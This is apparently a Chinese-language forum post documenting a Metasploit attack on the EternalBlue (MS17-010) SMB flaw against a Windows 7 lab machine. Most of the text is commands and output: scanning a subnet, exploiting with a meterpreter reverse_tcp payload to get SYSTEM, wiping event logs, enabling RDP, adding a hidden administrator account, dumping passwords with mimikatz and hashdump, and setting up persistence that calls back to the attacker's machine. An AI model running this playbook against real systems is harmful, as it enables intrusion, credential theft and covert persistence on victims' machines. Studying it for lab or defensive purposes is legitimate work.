永恒之蓝漏洞

Zss 发表于:

测试环境为靶机为:win7x64

 

扫描整个网络中可能存在ms17-101漏洞的机器

使用search ms17搜索一下需要使用的漏洞文件的路径

msf5 > search ms17

Matching Modules
================

   #   Name                                                   Disclosure Date  Rank     Check  Description
   -   ----                                                   ---------------  ----     -----  -----------
   0   auxiliary/admin/mssql/mssql_enum_domain_accounts                        normal   No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   1   auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                   normal   No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   2   auxiliary/admin/mssql/mssql_enum_sql_logins                             normal   No     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
   3   auxiliary/admin/mssql/mssql_escalate_execute_as                         normal   No     Microsoft SQL Server Escalate EXECUTE AS
   4   auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                    normal   No     Microsoft SQL Server SQLi Escalate Execute AS
   5   auxiliary/admin/smb/ms17_010_command                   2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   6   auxiliary/scanner/smb/smb_ms17_010                                      normal   Yes    MS17-010 SMB RCE Detection
   7   exploit/windows/fileformat/office_ms17_11882           2017-11-15       manual   No     Microsoft Office CVE-2017-11882
   8   exploit/windows/smb/doublepulsar_rce                   2017-04-14       great    Yes    DOUBLEPULSAR Payload Execution and Neutralization
   9   exploit/windows/smb/ms17_010_eternalblue               2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   10  exploit/windows/smb/ms17_010_eternalblue_win8          2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   11  exploit/windows/smb/ms17_010_psexec                    2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

auxiliary应该是扫描文件,exploit为攻击文件,首先扫描使用到auxiliary/scanner/smb/smb_ms17_010

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) >

使用 show option 查看当前配置文件需要设置的选项

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options 

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) >

扫描当前网段中可能存在17-101漏洞的系统

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.11.0/24
rhosts => 192.168.11.0/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 30
threads => 30
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.11.11:445     - Host is likely VULNERABLE to MS17-010! - Windows 8.1 Pro 9600 x64 (64-bit)
[-] 192.168.11.21:445     - Host does NOT appear vulnerable.
[-] 192.168.11.22:445     - Host does NOT appear vulnerable.
[*] 192.168.11.0/24:445   - Scanned  26 of 256 hosts (10% complete)
[*] 192.168.11.0/24:445   - Scanned  59 of 256 hosts (23% complete)
[*] 192.168.11.0/24:445   - Scanned  80 of 256 hosts (31% complete)
[*] 192.168.11.0/24:445   - Scanned 104 of 256 hosts (40% complete)
[*] 192.168.11.0/24:445   - Scanned 142 of 256 hosts (55% complete)
[+] 192.168.11.157:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
[*] 192.168.11.0/24:445   - Scanned 167 of 256 hosts (65% complete)
[*] 192.168.11.0/24:445   - Scanned 183 of 256 hosts (71% complete)
[*] 192.168.11.0/24:445   - Scanned 213 of 256 hosts (83% complete)
[*] 192.168.11.0/24:445   - Scanned 232 of 256 hosts (90% complete)
[*] 192.168.11.0/24:445   - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) >

发现157主机可能存在漏洞,那么使用攻击的文件exploit/windows/smb/ms17_010_eternalblue

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) >

设置rhosts为靶机地址,lhost为本机地址,设置payload负载

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.11.157
rhosts => 192.168.11.157
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.11.218
lhost => 192.168.11.218
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

攻击成功显示meterperter对话

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.11.218:4444 
[+] 192.168.11.157:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
[*] 192.168.11.157:445 - Connecting to target for exploitation.
[+] 192.168.11.157:445 - Connection established for exploitation.
[+] 192.168.11.157:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.11.157:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.11.157:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70  Windows 7 Enterp
[*] 192.168.11.157:445 - 0x00000010  72 69 73 65 20 37 36 30 30                       rise 7600       
[+] 192.168.11.157:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.11.157:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.11.157:445 - Sending all but last fragment of exploit packet
[*] 192.168.11.157:445 - Starting non-paged pool grooming
[+] 192.168.11.157:445 - Sending SMBv2 buffers
[+] 192.168.11.157:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.11.157:445 - Sending final SMBv2 buffers.
[*] 192.168.11.157:445 - Sending last fragment of exploit packet!
[*] 192.168.11.157:445 - Receiving response from exploit packet
[+] 192.168.11.157:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.11.157:445 - Sending egg to corrupted connection.
[*] 192.168.11.157:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.11.157
[*] Meterpreter session 1 opened (192.168.11.218:4444 -> 192.168.11.157:49210) at 2019-12-20 12:30:04 +0800
[+] 192.168.11.157:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.11.157:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.11.157:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

 

 

此时已经攻击成功了,可以输入一些命令来获取信息控制靶机

sysinfo获取系统的信息,shell直接打开靶机的命令窗口

meterpreter > sysinfo 
Computer        : WIN-APJBA6K988N
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x64
System Language : zh_CN
Meterpreter     : x64/windows
meterpreter > shell
Process 2460 created.
Channel 1 created.
Microsoft Windows [°汾 6.1.7600]
°爨̹Ԑ (c) 2009 Microsoft Corporation¡£±£´̹ԐȨ{¡£

C:\Windows\system32>

getuid获取当前用户权限

meterpreter >  getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter 功能展现

screenshot为截图

meterpreter > screenshot
Screenshot saved to: /root/jeiVIcFC.jpeg

开启视频 webcam_scream

清理日志

meterpreter > clearev
[*] Wiping 394 records from Application...
[*] Wiping 1145 records from System...
[*] Wiping 350 records from Security...

开启远程桌面和关闭防火墙

meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*]    RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]    The Terminal Services service is not set to auto, changing it to auto ...
[*]    Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20191220123443_default_192.168.11.157_host.windows.cle_203314.txt
meterpreter >

进入shell 可以创建用户提权开启远程桌面

shell
net user hack 123456 /add
net localgroup administrators hack /add
开启远程桌面
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

mimikatz查看密码

meterpreter > load mimikatz
[-] The 'mimikatz' extension has already been loaded.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID   Package    Domain           User              Password
------   -------    ------           ----              --------
0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE     
0;996    Negotiate  WORKGROUP        WIN-APJBA6K988N$  
0;47731  NTLM                                          
0;999    NTLM       WORKGROUP        WIN-APJBA6K988N$  
0;86447  NTLM       WIN-APJBA6K988N  Administrator     12345678

添加反弹shell脚本

run persistence -U -A -i 10 – 8090 -r kaliip

导出账号密码

run post/windows/gather/hashdump

kali中远程桌面

rdesktop 192.168.11.157

参考地址:https://www.anquanke.com/post/id/86245